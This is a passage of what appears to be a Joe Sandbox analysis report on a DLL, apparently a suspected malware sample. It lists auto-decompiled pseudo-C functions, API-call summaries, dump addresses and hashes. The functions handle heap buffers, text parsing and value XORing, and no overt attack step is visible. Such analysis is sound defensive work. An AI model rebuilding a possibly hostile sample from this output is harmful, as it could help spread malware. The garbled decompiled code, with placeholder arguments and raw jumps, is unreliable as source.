                  				void* _t78;
                  				unsigned int _t85;
                  				void* _t87;
                  				void* _t91;
                  				void* _t112;
                  				int _t116;
                  				long long _t122;
                  				void* _t125;
                  				void* _t126;
                  				int _t143;
                  				void* _t145;
                  				void* _t148;
                  
                  				_t78 = __eflags;
                  				_t87 = _t125;
                  				 *((long long*)(_t87 + 0x10)) = __rbx;
                  				 *((long long*)(_t87 + 0x18)) = _t122;
                  				 *((long long*)(_t87 + 8)) = __rcx;
                  				_t126 = _t125 - 0x860;
                  				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
                  				_t91 = __rdx;
                  				 *(_t126 + 0x30) = _t148 << 2;
                  				memcpy(_t148, _t145, _t143);
                  				_t9 = _t126 + 0x454; // 0x4a5
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t13 = _t126 + 0x658; // 0x6a9
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				memset(_t112, _t116);
                  				 *((intOrPtr*)(_t126 + 0x40)) = 1;
                  				_t73 = __edi - 1;
                  				if (_t78 < 0) goto 0x80001faa;
                  				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
                  				r12d = _t73;
                  				if (_t73 < 0) goto 0x80002081;
                  				_t65 =  *(__r8 + _t73 * 4);
                  				if (_t73 != r12d) goto 0x80001fe8;
                  				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
                  				_t66 = _t65 << 2;
                  				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
                  				if (0x10000001e == 0) goto 0x80002075;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t85 = _t66 >> 0x1e;
                  				if (_t85 == 0) goto 0x80002068;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				if (_t85 != 0) goto 0x80001fef;
                  				if (_t85 >= 0) goto 0x80001fbb;
                  				memcpy(??, ??, ??);
                  				r8d = 0x60c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}



















                  0x180001eec
                  0x180001eec
                  0x180001eef
                  0x180001ef3
                  0x180001ef7
                  0x180001f03
                  0x180001f0a
                  0x180001f22
                  0x180001f2c
                  0x180001f31
                  0x180001f46
                  0x180001f51
                  0x180001f56
                  0x180001f6b
                  0x180001f76
                  0x180001f7b
                  0x180001f8a
                  0x180001f8f
                  0x180001f9a
                  0x180001fa0
                  0x180001fa8
                  0x180001faa
                  0x180001fb5
                  0x180001fbb
                  0x180001fc8
                  0x180001fd0
                  0x180001fd2
                  0x180001fde
                  0x180001fe2
                  0x180002006
                  0x18000200b
                  0x180002027
                  0x18000202c
                  0x180002036
                  0x180002038
                  0x18000205e
                  0x180002063
                  0x18000206f
                  0x18000207b
                  0x180002093
                  0x1800020a2
                  0x1800020a8
                  0x1800020b4
                  0x1800020da

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
                  • Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                  				long long _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				intOrPtr _t40;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				intOrPtr* _t73;
                  				signed long long _t90;
                  				void* _t92;
                  				void* _t108;
                  				void* _t110;
                  				intOrPtr* _t112;
                  
                  				_t72 = __rbx;
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				_t69 =  *0x8000d4a0;
                  				_t57 = r8d;
                  				_v72 =  *((intOrPtr*)(_t69 + 8));
                  				_t8 = _t90 + 8; // 0x8
                  				r14d = _t8;
                  				HeapAlloc(??, ??, ??);
                  				if (_t69 == 0) goto 0x8000627d;
                  				if (_t57 == 0) goto 0x800061f7;
                  				_t112 = __rdx + 0x20;
                  				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
                  				if (_t69 == 0) goto 0x800061ec;
                  				r9d =  *((intOrPtr*)(_t112 - 8));
                  				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
                  				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
                  				HeapFree(??, ??, ??);
                  				_t40 = _a24;
                  				if (_t40 == 0) goto 0x800061ec;
                  				_t56 = 0 + _t40;
                  				if (1 - _t57 < 0) goto 0x80006176;
                  				r14d = 8;
                  				if (1 != _t57) goto 0x80006225;
                  				_v88 = _a64;
                  				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
                  				if (_t56 == 0) goto 0x8000626f;
                  				_t31 =  &_a8; // 0x8
                  				_t73 = _t31;
                  				if ( *_t73 == 0) goto 0x8000624b;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
                  				_t67 =  *((intOrPtr*)(_t73 + 0xc));
                  				if (_t67 == 0) goto 0x80006265;
                  				HeapFree(??, ??, ??);
                  				if (_t67 != 0) goto 0x80006238;
                  				HeapFree(??, ??, ??);
                  				return r14d;
                  			}


















                  0x180006108
                  0x180006108
                  0x18000610d
                  0x180006121
                  0x180006128
                  0x180006148
                  0x18000614d
                  0x18000614d
                  0x180006151
                  0x18000615d
                  0x180006167
                  0x180006172
                  0x180006184
                  0x18000618f
                  0x180006191
                  0x1800061ae
                  0x1800061c0
                  0x1800061c7
                  0x1800061cd
                  0x1800061d6
                  0x1800061e2
                  0x1800061ea
                  0x1800061f1
                  0x1800061f9
                  0x180006218
                  0x180006222
                  0x180006232
                  0x180006234
                  0x180006234
                  0x18000623e
                  0x180006245
                  0x180006252
                  0x180006254
                  0x180006258
                  0x18000625f
                  0x18000626d
                  0x180006277
                  0x180006297

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
                  • String ID:
                  • API String ID: 2523292596-0
                  • Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
                  • Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                  				intOrPtr _v80;
                  				void* _v88;
                  				long _v96;
                  				signed int _v104;
                  				long long _v112;
                  				long long _v120;
                  				void* __rbx;
                  				void* __rsi;
                  				void* __rbp;
                  				signed int _t55;
                  				signed int _t63;
                  				void* _t64;
                  				void* _t71;
                  				void* _t73;
                  				signed int _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t85;
                  				signed long long _t107;
                  				struct _FILETIME* _t110;
                  				void* _t128;
                  				void* _t129;
                  				long _t131;
                  				signed int _t132;
                  				void* _t135;
                  				void* _t137;
                  				void* _t147;
                  				void* _t148;
                  				void* _t149;
                  				signed int* _t150;
                  				long long _t151;
                  				void* _t153;
                  				signed long long _t155;
                  				void* _t157;
                  
                  				_t148 = _t137;
                  				 *((long long*)(_t148 + 0x18)) = __r8;
                  				 *((long long*)(_t148 + 0x10)) = __rdx;
                  				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
                  				r14d = 0;
                  				_v104 =  *0x8000d498;
                  				_t129 = __rcx;
                  				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
                  				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
                  				_t11 = _t155 + 1; // 0x1
                  				r12d = _t11;
                  				_v96 = _t131;
                  				goto 0x80007e24;
                  				_t132 = _v96;
                  				r12d = 2;
                  				_t14 =  &_a32; // 0xba
                  				_t15 =  &_v88; // 0x42
                  				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
                  				r8d = _a32;
                  				r13d = r8d;
                  				r13d = r13d - r12d;
                  				_t150 = _v88;
                  				if (_t132 == 0) goto 0x80007e7d;
                  				_t55 = _a8;
                  				_t150[0xa] = 1;
                  				_t150[0x12] = _t132;
                  				_t150[0xd] = _t55;
                  				_t150[0x10] = _t55;
                  				_t24 = _t129 + 0xb0; // 0xb0
                  				r9d = 0;
                  				 *_t150 = _v104 ^ 0x62ade362;
                  				_t150[3] =  *(_t129 + 0x48);
                  				_t150[2] =  *(_t129 + 0x4c);
                  				_t29 =  &_a8; // 0xa2
                  				_v112 = _t29;
                  				_t31 =  &_v104; // 0x32
                  				_v120 = _t31;
                  				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
                  				HeapFree(_t128, _t131, _t135);
                  				if (r13d == 0) goto 0x80007eef;
                  				if (_t73 == 0) goto 0x80007ee4;
                  				if (_t73 != 0x10d2) goto 0x80007eef;
                  				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
                  				if (_t73 != 0) goto 0x80007fff;
                  				_t74 = _a8;
                  				_t151 = _v104;
                  				r13d =  *(_t129 + 0x4c);
                  				_t63 = E00000001180008C48(_t74, _t151);
                  				_t36 =  &_a8; // 0xa2
                  				r9d = 1;
                  				 *(_t129 + 0x48) = _t74;
                  				 *(_t129 + 0x4c) = _t63;
                  				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
                  				_t75 = _t64;
                  				if (_t64 != 0) goto 0x80007fef;
                  				 *_a16 = _t151;
                  				 *_a24 = _a8;
                  				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
                  				r14d = 1;
                  				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
                  				GetSystemTimeAsFileTime(_t110);
                  				if (r14d == 0) goto 0x80007fa2;
                  				_t107 =  *((intOrPtr*)(_t129 + 0x58));
                  				if (_v80 - _t107 <= 0) goto 0x80007fa2;
                  				_t47 = _t129 + 0xb0; // 0xb0
                  				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
                  				asm("lock or dword [edi+0xdc], 0x1");
                  				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
                  				if (_v96 == 0) goto 0x80007fdc;
                  				HeapFree(??, ??, ??);
                  				if (_t75 == 0) goto 0x80007fd4;
                  				if (_t75 != 0x10d2) goto 0x80007fdc;
                  				E00000001180008BC4(_t110, _t129, _v96);
                  				return _t75;
                  			}





































                  0x180007dbc
                  0x180007dbf
                  0x180007dc3
                  0x180007dde
                  0x180007df5
                  0x180007df8
                  0x180007dfc
                  0x180007dff
                  0x180007e0a
                  0x180007e0e
                  0x180007e0e
                  0x180007e12
                  0x180007e17
                  0x180007e19
                  0x180007e1e
                  0x180007e24
                  0x180007e2c
                  0x180007e40
                  0x180007e46
                  0x180007e4e
                  0x180007e51
                  0x180007e54
                  0x180007e5c
                  0x180007e5e
                  0x180007e65
                  0x180007e6e
                  0x180007e73
                  0x180007e78
                  0x180007e81
                  0x180007e88
                  0x180007e93
                  0x180007e9a
                  0x180007ea2
                  0x180007ea7
                  0x180007eaf
                  0x180007eb4
                  0x180007eb9
                  0x180007ecb
                  0x180007ecd
                  0x180007ed6
                  0x180007eda
                  0x180007ee2
                  0x180007eea
                  0x180007ef1
                  0x180007ef7
                  0x180007efe
                  0x180007f03
                  0x180007f0c
                  0x180007f11
                  0x180007f19
                  0x180007f25
                  0x180007f28
                  0x180007f2b
                  0x180007f30
                  0x180007f34
                  0x180007f4a
                  0x180007f54
                  0x180007f5a
                  0x180007f5c
                  0x180007f66
                  0x180007f6d
                  0x180007f76
                  0x180007f78
                  0x180007f81
                  0x180007f83
                  0x180007f93
                  0x180007f95
                  0x180007fb1
                  0x180007fb8
                  0x180007fc2
                  0x180007fca
                  0x180007fd2
                  0x180007fd7
                  0x180007fee

                  APIs
                    • Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
                    • Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
                    • Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77
                  • HeapFree.KERNEL32 ref: 0000000180007ECD
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
                  • HeapFree.KERNEL32 ref: 0000000180007FC2
                  • HeapFree.KERNEL32 ref: 0000000180007FF7
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
                  • String ID:
                  • API String ID: 2852518528-0
                  • Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
                  • Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseEventFreeHandleHeapSleep
                  • String ID:
                  • API String ID: 1881548302-0
                  • Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
                  • Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
                  				void* __rbp;
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t38;
                  				void* _t42;
                  				void* _t54;
                  				void* _t55;
                  				intOrPtr _t56;
                  				void* _t60;
                  				void* _t61;
                  				void* _t65;
                  				signed int _t73;
                  				void* _t105;
                  				void* _t113;
                  				intOrPtr _t126;
                  				long long _t130;
                  				char* _t133;
                  				intOrPtr* _t140;
                  				long _t143;
                  				long _t145;
                  				void* _t148;
                  				void* _t150;
                  				void* _t151;
                  				intOrPtr* _t155;
                  				char* _t162;
                  				void* _t164;
                  				void* _t171;
                  				long _t173;
                  				int _t176;
                  				void* _t180;
                  				void* _t182;
                  
                  				_t164 = __r10;
                  				_t140 = __rdx;
                  				_t130 = __rcx;
                  				 *((long long*)(_t150 + 0x10)) = __rbx;
                  				 *((long long*)(_t150 + 8)) = __rcx;
                  				_t151 = _t150 - 0x60;
                  				_t126 =  *0x8000d4a0;
                  				r14d = r8d;
                  				if (r8d == 0) goto 0x8000160a;
                  				_t73 = __esi | 0xffffffff;
                  				r11d = 0;
                  				r10d = 0;
                  				_t29 =  *__rdx;
                  				if (_t29 == 0xd) goto 0x80001419;
                  				if (_t29 == 0xa) goto 0x80001419;
                  				if (0 != 0) goto 0x800013ef;
                  				if (_t29 == 0x20) goto 0x800013f1;
                  				if (_t29 == 9) goto 0x800013f1;
                  				goto 0x800013f1;
                  				if (_t29 != 0x3b) goto 0x800013fd;
                  				if (r11d != 0) goto 0x8000141d;
                  				r11d = 1;
                  				if (_t29 != 0x3d) goto 0x80001407;
                  				if (0 != 0) goto 0x8000141d;
                  				if (_t29 != 0x7c) goto 0x8000141d;
                  				if (r10d != 0) goto 0x8000141d;
                  				if (1 != 0) goto 0x8000141d;
                  				r10d = 1;
                  				goto 0x8000141d;
                  				if (1 != 0) goto 0x80001424;
                  				if (1 != 0) goto 0x800013ce;
                  				if (__rdx == _t143) goto 0x8000160a;
                  				r13d = r13d - r8d;
                  				r13d = r13d - 1;
                  				r14d = r14d + r13d;
                  				r13d = 1;
                  				if (r11d == 1) goto 0x800015fb;
                  				if (1 == 0) goto 0x80001459;
                  				r12d = 1;
                  				_t5 = _t140 - 1; // -1
                  				_t54 = _t5;
                  				goto 0x8000145c;
                  				_t173 = _t143;
                  				if (_t54 == 0) goto 0x80001605;
                  				if (r10d == 0) goto 0x800014db;
                  				_t6 = _t164 - 1; // -1
                  				_t60 = _t6;
                  				if (_t60 == 0) goto 0x800014db;
                  				_t31 =  <  ? _t60 : 0x10;
                  				if (0x10 == 0) goto 0x800014ab;
                  				r9b =  *__rdx;
                  				if (r9b == dil) goto 0x800014ab;
                  				if (r9b == 0x20) goto 0x800014ab;
                  				_t105 = r9b - 9;
                  				if (_t105 == 0) goto 0x800014ab;
                  				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
                  				if (_t105 != 0) goto 0x8000148c;
                  				_t61 = _t60 + 1;
                  				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
                  				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
                  				_t162 = _t61 + __rdx;
                  				if ( *_t162 == 0x20) goto 0x800014c6;
                  				if ( *_t162 != 9) goto 0x800014cd;
                  				goto 0x800014ba;
                  				r9b =  *((intOrPtr*)(_t151 + 0x30));
                  				_t155 = __rdx + _t126;
                  				_t55 = _t54 - _t61 + 1;
                  				goto 0x800014e3;
                  				r9b = dil;
                  				 *((intOrPtr*)(_t151 + 0x30)) = dil;
                  				_t64 =  <  ? _t55 : 0x10;
                  				r11d = 0x10;
                  				if (0x10 == 0) goto 0x80001524;
                  				_t56 =  *_t155;
                  				if (_t56 == dil) goto 0x80001524;
                  				if (_t56 == 0x20) goto 0x80001524;
                  				if (_t56 == 9) goto 0x80001524;
                  				_t14 = _t130 - 0x61; // -96
                  				_t113 = _t14 - 0x19;
                  				if (_t113 > 0) goto 0x80001518;
                  				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
                  				r11d = r11d + _t73;
                  				if (_t113 != 0) goto 0x800014fc;
                  				_t65 = ( <  ? _t55 : 0x10) - r11d;
                  				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
                  				if (r9b != dil) goto 0x80001546;
                  				r8d = 0x10;
                  				memcpy(_t182, _t180, _t176);
                  				if (_t173 == _t143) goto 0x80001591;
                  				if (1 <= 0) goto 0x80001568;
                  				if ( *_t173 == 0x20) goto 0x8000155f;
                  				if ( *_t173 != 9) goto 0x80001568;
                  				if (1 - 1 < 0) goto 0x80001551;
                  				if (1 == 1) goto 0x80001593;
                  				_t38 = _t148 - 1;
                  				if (_t38 <= 0) goto 0x8000158c;
                  				_t133 = _t38 + _t173 + 1;
                  				if ( *_t133 == 0x20) goto 0x80001583;
                  				if ( *_t133 != 9) goto 0x8000158c;
                  				if (_t38 + _t73 > 0) goto 0x80001579;
                  				goto 0x80001593;
                  				_t22 = _t148 + 1; // 0x1
                  				r8d = _t22;
                  				HeapAlloc(_t171, _t143, _t145);
                  				if (_t126 == _t143) goto 0x800015f8;
                  				r8d = 0;
                  				memcpy(_t148, ??);
                  				 *((intOrPtr*)(__rbx + _t126)) = dil;
                  				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
                  				r9d = 0;
                  				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
                  				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
                  				HeapFree(??, ??, ??);
                  				if (r14d == 0) goto 0x8000160a;
                  				goto 0x800013bb;
                  				return 0xb;
                  			}


































                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x180001381
                  0x180001391
                  0x180001395
                  0x18000139e
                  0x1800013ab
                  0x1800013b8
                  0x1800013c8
                  0x1800013cb
                  0x1800013ce
                  0x1800013d3
                  0x1800013d7
                  0x1800013db
                  0x1800013df
                  0x1800013e3
                  0x1800013ed
                  0x1800013f3
                  0x1800013f8
                  0x1800013fa
                  0x1800013ff
                  0x180001403
                  0x180001409
                  0x18000140e
                  0x180001412
                  0x180001414
                  0x180001417
                  0x18000141b
                  0x180001422
                  0x180001427
                  0x18000142d
                  0x180001430
                  0x180001433
                  0x180001436
                  0x180001440
                  0x180001448
                  0x18000144c
                  0x18000144f
                  0x18000144f
                  0x180001457
                  0x180001459
                  0x18000145e
                  0x180001467
                  0x180001469
                  0x180001469
                  0x18000146f
                  0x18000147b
                  0x180001482
                  0x18000148c
                  0x180001492
                  0x180001498
                  0x18000149a
                  0x18000149e
                  0x1800014a0
                  0x1800014a9
                  0x1800014ab
                  0x1800014ad
                  0x1800014b2
                  0x1800014b7
                  0x1800014be
                  0x1800014c4
                  0x1800014cb
                  0x1800014cd
                  0x1800014d4
                  0x1800014d7
                  0x1800014d9
                  0x1800014db
                  0x1800014de
                  0x1800014ea
                  0x1800014ed
                  0x1800014f2
                  0x1800014fc
                  0x180001502
                  0x180001507
                  0x18000150c
                  0x18000150e
                  0x180001511
                  0x180001513
                  0x180001518
                  0x18000151f
                  0x180001522
                  0x180001524
                  0x180001527
                  0x18000152f
                  0x18000153b
                  0x180001541
                  0x180001549
                  0x18000154f
                  0x180001556
                  0x18000155d
                  0x180001566
                  0x18000156a
                  0x18000156c
                  0x180001574
                  0x180001576
                  0x18000157c
                  0x180001581
                  0x18000158a
                  0x18000158f
                  0x180001593
                  0x180001593
                  0x18000159c
                  0x1800015a8
                  0x1800015aa
                  0x1800015b5
                  0x1800015c2
                  0x1800015c6
                  0x1800015d3
                  0x1800015e0
                  0x1800015e5
                  0x1800015f2
                  0x1800015fe
                  0x180001600
                  0x180001623

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heapmemcpy$AllocFree
                  • String ID:
                  • API String ID: 1496448200-0
                  • Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
                  • Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
                  				char _v48;
                  				long long _v56;
                  				long long _t43;
                  				long long _t57;
                  				long long _t58;
                  				void* _t68;
                  				long long* _t73;
                  				void* _t75;
                  
                  				_t56 = __rdx;
                  				_a16 = __rbx;
                  				_a24 = __rbp;
                  				_a32 = __rsi;
                  				_t43 =  *0x8000d4a0;
                  				r12d = r8d;
                  				_t75 = __rdx;
                  				if (__rdx == _t57) goto 0x80001304;
                  				if (r8d == 0) goto 0x80001304;
                  				EnterCriticalSection(??);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(??);
                  				_t7 =  &_a8; // -110
                  				r8d = 0;
                  				_v48 = 0;
                  				_a8 = 0;
                  				_v56 = _t57;
                  				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
                  				r8d = _a8;
                  				HeapAlloc(??, ??, ??);
                  				_t58 = _t43;
                  				if (_t43 == 0) goto 0x800012f8;
                  				_v48 = 0x10;
                  				_t14 =  &_a8; // -110
                  				_t73 = _t14;
                  				_v56 = __rcx + 0x72;
                  				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
                  				 *__r9 = _t58;
                  				 *_a40 = _a8;
                  				goto 0x800012fd;
                  				HeapFree(??, ??, ??);
                  				goto 0x800012fd;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				goto 0x80001313;
                  				 *_t73 = _t58;
                  				 *_a40 = 0;
                  				return 0;
                  			}











                  0x180001208
                  0x180001208
                  0x18000120d
                  0x180001212
                  0x180001224
                  0x180001237
                  0x18000123a
                  0x180001243
                  0x18000124c
                  0x180001256
                  0x18000125c
                  0x180001265
                  0x18000126b
                  0x180001270
                  0x180001279
                  0x18000127d
                  0x180001281
                  0x180001290
                  0x180001292
                  0x18000129c
                  0x1800012a2
                  0x1800012a8
                  0x1800012ae
                  0x1800012b6
                  0x1800012b6
                  0x1800012bb
                  0x1800012d2
                  0x1800012e0
                  0x1800012e4
                  0x1800012e6
                  0x1800012f0
                  0x1800012f6
                  0x1800012fd
                  0x180001302
                  0x18000130c
                  0x180001311
                  0x180001331

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
